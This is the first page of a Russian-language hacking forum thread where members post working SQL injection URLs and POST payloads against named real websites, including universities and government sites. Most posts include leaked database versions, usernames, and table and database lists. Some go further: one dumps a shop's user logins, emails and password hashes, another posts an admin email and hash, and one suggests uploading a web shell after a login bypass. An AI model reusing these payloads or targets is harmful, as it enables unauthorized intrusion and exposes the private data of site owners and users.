Форум АНТИЧАТ
Страница 1 из 7 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=424558)

faza02 27.04.2015 20:15
Постим сюда найденные SQL инъекции. Прежде, чем запостить, проверьте, не выкладывалась ли SQLi ранее:

Код:
Code:
Google: site:forum.antichat.ru [ваш сайт с SQLi]
Предыдущая тема: /threads/21336/

ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.

Правила этой темы:
  1. Инъекции вида:

    Код:
    Code:
    http://site.ru/index.php?a='
    будут удаляться. Также желательно в посте указывать версию БД.
  2. В теме запрещается публиковать пароли и хеши к админкам. Они будут удаляться, а нарушители - наказываться.
  3. Флейм/оффтоп удаляется и жестко наказывается.

kingbeef 29.04.2015 13:51
Скуля с выводом в адресной строке

Код:
Code:
http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--+k
5.5.36-34.0-632.precise

gromoza 30.04.2015 09:54
Код:
Code:
http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html
(1062) Duplicate entry 'macnew@127.0.0.11' for key 'group_key'

MaxFast 30.04.2015 10:21
Код:
Code:
http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10,11,12,13,14--
ecomobil@localhost:ecomobil

teh 03.05.2015 23:47
Код:
Code:
http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15--
crona_site 5.5.25 db_crona@localhost

teh 07.05.2015 22:40
Код:
Code:
http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2,3,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info
znvc@localhost

5.1.73

CPOSI

Код:
Code:
http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=


ruboohran_riba@192.168.1.28

5.5.27-log

ruboohran_riba

reuvenmatbil 09.05.2015 11:08
Код:
Code:
http://www.satena.com/about-us/board-of-directors/(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(75),CHAR(80),CHAR(112),CHAR(53),CHAR(111),CHAR(89),CHAR(89),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

MaxFast 10.05.2015 19:29
Код:
Code:
http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2
Будьте внимательны, MySQL 4

fakecoder 14.05.2015 02:28
Код:
Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+
in TITLE

8k hosts/day

кому интересно повоевать с waf... хотя faza ужо замочил...

Код:
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4

faza02 14.05.2015 02:55
Цитата:
Сообщение от fakecoder
fakecoder said:

кому интересно повоевать с waf
Код:
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4
посты лучше склеить

Код:
Code:
http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+
5.0.77-log

EoGeneo 15.05.2015 08:47
Цитата:
Сообщение от fakecoder
fakecoder said:

Код:
Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+
in TITLE
8k hosts/day
ничего интересного

База:

invest-expert

Таблицы:

table_article

table_banner

table_coment

table_fotos

table_kategorie

table_menue

table_news

table_produkt

table_projects

table_projects_archive

table_text_blocks

table_texte

table_video

Br@!ns 21.05.2015 13:42
Код:
Code:
http://frameworksgallery.com/admin/checkuser.php
POST
member_name=k&password=kkkkkk' or 1=1 -- &Submit=Submit
шелл phtml лить, если что

Mister_Bert0ni 21.05.2015 19:21
Код:
Code:
http://www.lampbulbs.co.uk/product.php
?prodid=162' +UNION(/**_**/SELECT(1),(2),(concat/**_**/((0x3c62723e),(0x7e7e4d69737465725f42657274306e697e7e),(
0x3c62723e),(version/**_**/()),(0x3c62723e),(user/**_**/()),(0x3c62723e),(database/**_**/()))),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42))--+

karter_kg 21.05.2015 23:24
Код HTML:
HTML:
http://www.ghanaweb.com/GhanaHomePage/soccer.PredictionLeague/index.php?cmd=showmonthlywinners&month=24121'+and+1=0+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--+
user() =rijk5_w@209.68.59.161

@@version = 5.1.67-log

Alexa = 2,645

karter_kg 23.05.2015 16:42
Код:
Code:
http://www.uvm.edu/crs/sdc/county_result.php?co_id=4'+and+extractvalue(1,concat(0x3a,(user())))+--+
user()=rural_admin@tubeweb1.uvm.edu

version() =5.5.43-37.2-log

Alexa = 15,582

Код:
Code:
http://depts.washington.edu/neurolog/psych/archives/viewPres.php?id=708'and+extractvalue(1,concat(0x3a,(user())))+--+
user() = root@depts12.u.washington.edu

version() = 5.5.18

R3hab 29.05.2015 14:25
http://www.sangean.com/image/LOGO/SANGEAN_LOGO_RED.gif

Цитата:
Сообщение от None
sangean.com/products/product.asp?mid=40%20or%201=@@version
ТИЦ20 PR4 AR460,627

DezMond™ 02.06.2015 10:27
ПР7

Код:
Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,version(),9,10,11,12+--+
друпал

Код:
Code:
https://www.stevens.edu/provost/CHANGELOG.txt
как узнать префикс бд?

psihoz26 02.06.2015 14:49
нет префикса же

Код:
Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12+from+information_schema.tables+where+table_schema=database()+--+

Br@!ns 03.06.2015 17:11
Код:
Code:
http://www.winelabelworld.com/list.php?c=18&w=8+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSION(),+1,+63),+FLOOR(RAND(0)*2)))+--+
Query failed: Duplicate entry '5.0.951' for key 1

У сайта localwineevents.com, база "lwe". Которая находится рядом / alexa 163,137

Insaider 05.06.2015 00:14
Код:
Code:
http://education.zyxel.com/ZCNE_Course_Event.asp?cert_id=1' or 1=@@version--
Windows version: 2003

SQL Server version: 2005

Database name: education_3

System user: cso_user

Server name: CSO-ELDB

psihoz26 08.06.2015 15:02
Выжимал "максимум" с error based )) от потенциальной уязвимости до начала дампа за ~5 запросов))

Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/search/1%27%29%09and%09%28%28SELECT%09%28i%09IS%09NOT%09NULL%29%09-%09-9223372036854775808%09FROM%09%28SELECT%09%28concat%28version%28%29%29%29i%29a%29%29=2--%09
version() = 5.5.43-0+deb7u1

Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,1,400),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,300,700),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Результат(имена таблиц в hoursppc_biznewenc):

Код:
Code:
addressbook
allorg_orders
best5
blog_commentmeta
blog_comments
blog_links
blog_options
blog_postmeta
blog_posts
blog_term_relationships
blog_term_taxonomy
blog_terms
blog_usermeta
blog_users
bonus_types
bonuses
categories
cats_of_groups
contacts_block
countries
coupons
currancies
domains
domains2
emails
fake_products
global
groups
images
langs
login
messages
news
old_orders
old_users
old_users2orders
order_discounts
order_items
order_statuses
orders
org_orders
pages
payments
pro_orders
products
real2fake
serialize_data
settings
shippings
single
states
storages
texts
ticket_action
ticket_notify
ticket_settings
ticket_ticket
ticket_ticket_bak
ticket_user
users
users2orders
users_anabol
warns
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' and @:=CONCAT(@,0x2C,CONCAT(column_name))),@),5)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Результат(имена колонок в hoursppc_biznewenc.users):

Код:
Code:
id
login
password
name
address
city
zip
country
state
email
phone
discount
added
lastvisit
status
canUpgrade
comments
is_active
md5Password
old_orders_count
old_orders_numbers
terms
active
history
refer
Код:
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POST DATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(select length(MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM users WHERE @:=CONCAT(@,0x2C,CONCAT(login,0x3b,email,0x3b,password))),@),5))),0x3a,(SELECT mid(@,1,400)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Результат (обрывок от select concat(login,0x3b,email,0x3b,password) from hoursppc_biznewenc.users):

Код:
Code:
Neval;chuvyrlo@gmail.com;da3f50400551551ea03382ac7c3bfa587f789b68
tjoxvic;tjoxvic@gmail.com;da3f50400551551ea03382ac7c3bfa587f789b68
daniel middleton;daniel.middleton@afg.usmc.mil;da3f50400551551ea03382ac7c3bfa587f789b68
baddscorp;baddscorp@aol.com;da3f50400551551ea03382ac7c3bfa587f789b68
luga888;luga888@live.com;da3f50400551551ea03382ac7c3bfa587f789b68
mike6484;mike7542@comcast.net;da3f50400551

Br@!ns 09.06.2015 23:15
Код:
Code:
http://forums.sbo.sailboatowners.com/q_login.php?do=login
POST

.SpoilerTarget" type="button">Spoiler: POST
redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Find ex.php%3Foption%3Dcom_content%26task%3Dview%26id%3 D30%26Itemid%3D64&vb_login_username=asfasf'or(Extr actValue(1,concat(0x3a,(select+user()))))='1&vb_lo gin_password=asfasf&cookieuser=1&image.x=0&image.y =0&s=&do=login&vb_login_md5password=0a040ec34abbfb 7f3030345244a913c9&vb_login_md5password_utf=0a040e c34abbfb7f3030345244a913c9

Интегрированый вб в жумлу, везде попрятаны админки и т.п, но все ищется и льется . Мб кому интересно будет попробовать

huntercs16 09.06.2015 23:41
Код:
Code:
https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a)+)+--+;
wp стоит

nikonic 11.06.2015 20:33
КАМЧАТСКИЙ НАУЧНЫЙ ЦЕНТР

Код:
Code:
http://www.kscnet.ru/ivs/kvert/volc.php?lang=en&name=99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19,20+--+
тиц 750 пр 5

5.5.30-log

3nvY 15.06.2015 23:45
SQLi:

Код:
Code:
http://boroughs.org/subpage.php?link=Borough-News-Magazine'+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3b3c62723e,database(),user(),version(),@@version_compile_os),7,8,9,10,11+--+

Unknowhacker 17.06.2015 15:00
http://sanpid.com/images/logo_vs.png

Код:
Code:
http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+
Версия: 5.0.96-community-log

3nvY 18.06.2015 07:09
SQLi:

Код:
Code:
http://www.rnd.goa.gov.in/content_news_disp.php?id=-14+union+select+1,2,3,4,CONCAT_WS%280x3b3c62723e,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,6,7,8,9,10,11+--+
rnd@localhost; 5.6.22; rnd

grimnir 19.06.2015 11:02
Код:
Code:
http://pr.alexa.cn/index.php?url=1' OR EXTRACTVALUE(8396,CONCAT(0x5c,0x716a787171,(SELECT (ELT(8396=8396,1))),0x7171787671)) AND 'BvUT'='BvUT
alexa.cn трафф 590к

error-based

hostname: 'AY12063001214105c7538'

'root'@'127.0.0.1'

Nginx, PHP 5.4.37, MySQL >= 5.0.0

BD list:

alexa

icpdb

information_schema

mysql

performance_schema

test

tour2013

whoisdb

xj_cn_2014

grimnir 22.06.2015 10:32
Код:
Code:
http://leton.tv/player.php?streampage=tnj1bde' AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x716a717671,(SELECT (ELT(4549=4549,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Iimq'='Iimq&width=600&height=450
leton.tv трафф 1.6kk сервис стримингово видео

error based

PHP 5.3.3, Nginx, MySQL >= 5.0.0

DBA: True

hostname: 'hostname.change.me'

''@'hostname.change.me'

''@'localhost'

'root'@'127.0.0.1'

'root'@'hostname.change.me'

'root'@'localhost'

DB list:

information_schema

megom

mysql

scorenews

test

wowza

wowza2

wowza2_b1

grimnir 25.06.2015 11:40
cashbackmonitor.comтрафф 430ксравнение шопов

Код:
Code:
Parameter: #1* (URI)
Код:
  AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND 2703=2703 AND 'nUyh'='nUyh

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND (SELECT 2579 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(2579=2579,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlmZ'='hlmZ

    Title: Generic UNION query (NULL) - 22 columns
    Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4647646f4f536d657563,0x7178787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


web server operating system: Linux Red Hat Enterprise 6 (Santiago)

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL >= 5.0.0

available databases [3]:

[*] CashbackMonitor

[*] information_schema

[*] test

-------------------------------------------------------------

sydney.edu.au трафф 2.2kк

Код:
Code:
Type: error-based
Код:
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://sydney.edu.au:80/medicine/public-health/research/publications.php?year=2010' AND (SELECT 5421 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (ELT(5421=5421,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sBCP'='sBCP


web server operating system: Linux Red Hat Enterprise 5 (Tikanga)

web application technology: Apache 2.2.3, PHP 5.1.6

back-end DBMS: MySQL >= 5.0.0

available databases [266]:

Код:
Code:[*] acaorn
Код:
[*] acaorn_wikidb[*] adri[*] anzacdb[*] appan[*] brainprofiling[*] cancer_sphider[*] cancerlearning[*] cancerlearning_tw[*] cards[*] cera[*] cl_resources[*] cl_surveys[*] cl_tw[*] clphpbb[*] ctc[*] ctctest[*] database[*] drh[*] elgg[*] emergency[*] eventsdb_dent[*] ex_allprofiles[*] ex_bdent[*] ex_bmri[*] ex_boh[*] ex_bond[*] ex_bond-post-upgrade[*] ex_bond_2005dev[*] ex_bond_after_upgrade[*] ex_bond_stage3-4[*] ex_bond_stage3_4[*] ex_bosch[*] ex_boschtest[*] ex_cirus[*] ex_cmsapitest[*] ex_cmsapitestreprox[*] ex_ctc[*] ex_dentistry[*] ex_devhealth[*] ex_global_health[*] ex_health[*] ex_kolling[*] ex_kollingfoundation[*] ex_medsci[*] ex_ncsc[*] ex_pharmacology[*] ex_pharmacy[*] ex_pharmold[*] ex_physiology[*] ex_proxyacaorn[*] ex_proxyaddiction[*] ex_proxyalumni[*] ex_proxyanatomy[*] ex_proxyapnet[*] ex_proxybmri[*] ex_proxybosch[*] ex_proxybsim[*] ex_proxycancerresearch[*] ex_proxycentral[*] ex_proxychw[*] ex_proxyconcord[*] ex_proxycoo[*] ex_proxycoppleson[*] ex_proxycpah[*] ex_proxydiabetes[*] ex_proxydrh[*] ex_proxyeye[*] ex_proxyfmrc[*] ex_proxyforensic[*] ex_proxygeneralpractice[*] ex_proxygenetic[*] ex_proxyglobalhealth[*] ex_proxyhealth[*] ex_proxyhocmai[*] ex_proxyimaging[*] ex_proxymeddiscipline[*] ex_proxymedfac[*] ex_proxymedfacfull[*] ex_proxymedfound[*] ex_proxymedicalfoundation[*] ex_proxymedicalhumanities[*] ex_proxymedsci[*] ex_proxymuseumtest[*] ex_proxynepean[*] ex_proxynmrf[*] ex_proxynorthern[*] ex_proxynrf[*] ex_proxyobsgynneo[*] ex_proxyome[*] ex_proxyopme[*] ex_proxypathology[*] ex_proxypharmacology[*] ex_proxyphysiology[*] ex_proxypmri[*] ex_proxypoche[*] ex_proxyprofiles[*] ex_proxyproteomics[*] ex_proxypsych[*] ex_proxyresearchteams[*] ex_proxyrural[*] ex_proxyseib[*] ex_proxystirc[*] ex_proxysurgery[*] ex_proxyvelim[*] ex_proxyvideoconf[*] ex_proxywestern[*] ex_proxywestmead[*] fhbc[*] ht_-v[*] ht_acaorn[*] ht_acaorntest[*] ht_addiction[*] ht_addictiontest[*] ht_agingbonetest[*] ht_anaes[*] ht_anatomytest[*] ht_apnet[*] ht_apnettest[*] ht_avit[*] ht_avittest[*] ht_bdent[*] ht_bmri[*] ht_bmritest[*] ht_bosch[*] ht_bosch_old[*] ht_bsim[*] ht_bsimtest[*] ht_cancerlearning[*] ht_cancerresearch[*] ht_cancerresearchtest[*] ht_central[*] ht_centraltest[*] ht_cochrane-renal[*] ht_concord[*] ht_concordtest[*] ht_cootest[*] ht_coppleson[*] ht_cpahtest[*] ht_ctc[*] ht_dentistry[*] ht_dentistrytest[*] ht_dermatology[*] ht_dermatologytest[*] ht_drh[*] ht_drhtest[*] ht_exambank[*] ht_forensic[*] ht_forensictest[*] ht_genetic[*] ht_genetictest[*] ht_globalhealthtest[*] ht_gmp[*] ht_gp[*] ht_gptest[*] ht_health[*] ht_healthbook[*] ht_healthbooktest[*] ht_healthtest[*] ht_hocmai[*] ht_hocmaitest[*] ht_imagingtest[*] ht_jira[*] ht_jmo[*] ht_kidsresearch[*] ht_kidsresearchtest[*] ht_kolling[*] ht_kollingtest[*] ht_localhost[*] ht_medfac[*] ht_medfactest[*] ht_medicalfoundation[*] ht_medicalfoundationtest[*] ht_medicalhumanities[*] ht_medicalhumanitiestest[*] ht_medicine[*] ht_medicinetest[*] ht_medsci[*] ht_medscitest[*] ht_mga[*] ht_mgatest[*] ht_nbrc[*] ht_nbrctest[*] ht_ncirs[*] ht_ncirstest[*] ht_ncsc[*] ht_nepean[*] ht_nepeantest[*] ht_neurologicalsigns[*] ht_northern[*] ht_northerntest[*] ht_nrf[*] ht_nrftest[*] ht_obsgynneo[*] ht_obsgynneotest[*] ht_ome[*] ht_ometest[*] ht_opme[*] ht_opmetest[*] ht_ovarian[*] ht_paediatrics[*] ht_paediatricstest[*] ht_pathologytest[*] ht_pharmacologytest[*] ht_physiology[*] ht_physiologytest[*] ht_poche[*] ht_pochetest[*] ht_psych[*] ht_psychtest[*] ht_pubhealth[*] ht_rural[*] ht_ruraltest[*] ht_scssc[*] ht_scssctest[*] ht_smokecheck[*] ht_smokechecktest[*] ht_stirc[*] ht_stirctest[*] ht_surgery[*] ht_surgerytest[*] ht_velim[*] ht_velimtest[*] ht_western[*] ht_westerntest[*] htcheck[*] infdisimmunologytest[*] information_schema[*] kolling[*] kollingaccess[*] kollinglive[*] limesurvey[*] limesurvey2[*] medicaldeanstestwp[*] medicaldeanswp[*] medsoc[*] moodle[*] moodle_cancer[*] mysql[*] nbcc[*] neurosigns[*] nmrf[*] orsee[*] pathologytest[*] pgau[*] phpesp[*] pmri[*] pmritest[*] proceduresmanual[*] publichealth[*] rehab[*] simrob_obs[*] ss[*] surgsoc[*] test[*] vmaillogin[*] wikibmri[*] wikicompass[*] wikidb[*] wikidevteam[*] wikifacmuseumtest[*] wikimedadminpedia[*] wikimediabank[*] wikiorrtmanual[*] wikioverseascahpedia[*] wpmysql

grimnir 05.07.2015 18:56
Код:
Code:
https://www.tcd.ie/irishfilm/print.php?search=keyword&q=radharc&exactMatch=&extraSearch=-8628 OR 1 GROUP BY CONCAT(0x716b716271,(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END)),0x7170787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
tcd.ie трафф 1.2kk колледж Ирландии

error based

Apache 2.4.10;MySQL >= 5.0.0

Database: filmresearch_db

[6 tables]

+-----------------+

| bibliography |

| biography |

| censor_appeal |

| censor_decision |

| censor_film |

| film |

+-----------------+

Код:
Code:
http://bgequipment.powweb.com:80/service_detail.php?ID=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1856=1856,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GkPg'='GkPg
powweb.com трафф разный

error based

PHP 5.3.29, Apache 2;MySQL >= 5.0.0

available databases [2]:
[*] bges
[*] information_schema

3nvY 05.07.2015 19:56
Код:
Code:
http://rid.waipadc.govt.nz/cemetery/cemetery_record_view.php?id=-2774+union+select+1,concat_ws%280x3c62723e,version%28%29,database%28%29,user%28%29%29,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
cemetery@aoraki.webbase.net.nz;

5.0.51a-24+lenny5-log;

cemetery

BigBear 06.07.2015 17:56
Код:
Code:
http://www.polarview.aq/old/tablelisting_SAR.php?hemi=S&time=Last+week&area=NewZealand'+and+ascii(substr(version(),6,1))>'113'+and+concat(1,1,1)='111
Ничего интересного, просто "обычная" PostgreSQL инъекция на одном из сайтов Антарктиды. Проходите дальше.

ocheretko 10.07.2015 07:02
ASP, MS-SQL

Тип атаки: Convert INT ODBC Error

Код:
Code:
Версия - http://nchla.org/issues.asp?ID=1+and+1=convert(int,@@version)--
Код:
Code:
Пользователь http://nchla.org/issues.asp?ID=1+and+1=convert(int,user_name())--
Код:
Code:
База данных http://nchla.org/issues.asp?ID=1+and+1=convert(int,db_name())--
Код:
Code:
Перебираем имена баз данных
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(0))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(1))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(2))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(3))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(4))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(5))--
Ну и дамп

http://i11.pixs.ru/storage/7/3/4/dum...1_17973734.png

DezMond™ 10.07.2015 15:51
PR7

Код:
Code:
http://www7.inra.fr/drh/cr2013/listeparconcours-cr2.php?choix=8&langue=FR+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+

Mister_Bert0ni 16.07.2015 15:28
Код:
Code:
http://www.compactkitchens.in/productdetail.php?cat_id=.37' and @pipka:=(
(SELECT+GROUP_CONCAT(/*!12345table_name*/,0x2020203a3a3a2020,/*!12345column_name*/+SEPARATOR+0x3c62723e)+FROM+
/*!50000INFORMATION_SCHEMA.columns*/+WHERE+TABLE_SCHEMA=DATABASE/**/()))/*!50000UNIOn*/ SELECT 1,2,3,4,5,6,
concat/**/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE/**/(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version/**/(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,@pipka),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -
Код:
Code:
http://www.ilovemusica.com/shop.php?cat=.6 UNION SELECT concat(0x3c2f7469746c653e,0x3c63656e7465723e,
0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x3c212d2d),null -- -

kingbeef 19.07.2015 01:44
Еще...

Вывод в алерте

Код:
Code:
http://www.agriagency.com.ua/comments/10227.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1

KIR@PRO 23.07.2015 17:16
ВНИМАНИЕ !!! Все инъекции заключаем в тег [COLOR="rgb(128, 255, 0)"][ CODE ] [ / CODE ][/COLOR], ни каких [COLOR="rgb(255, 0, 0)"][ URL ] [ / URL ][/COLOR] быть не должно.

Инъекции в POST выкладываем тоже в [ CODE ] [ /CODE ]

Код:
Code:
http://site.zone/index.php?cmd=viewpost
POST:
id=-1'+and+1=2+union+select+1,2,3,4,5,version(),7,8+--+
Текст в [ URL ] [ /URL ] урезается по длинне и становится не удобным для чтения, в отличии от [ CODE] [ /CODE ]

spherics 28.07.2015 15:34
Код:
Code:
http://www.tv3.ie/news_sub_page.php?locID=1.2.888000+union+select+concat_ws(0x3a3a,version(),user(),database())--
Version: 5.0.95-log

user : tv3_readonly@localhost

database: tv3

goot 30.07.2015 09:11
Привет все!

Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает

И фильтр не пропускает логин админа(((

Код:
Code:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'
Там только перебор бессмысленный сразу инжектировать нужно

Я через софт Havij v1.16 скачал базу

Код:
Code:
Target:        http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP:        91.236.136.194
Web Server:    nginx
DB Server:    MySQL error based
Resp. Time(avg):    85 ms
Sql Version:    5.5.43-0+deb7u1-log
Compile OS:    debian-linux-gnu
Host Name:    ura.webhost1.ru
Current DB:    sergei62_og
Installation dir:    /usr
данные админа

povar.admin@gmail.com

$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO

Залить не получилось(( не нашел пути

Кто сможет раскопать отпишите в личку (Как удалось?)

P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите)))


Время: 14:53
Страница 1 из 7 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице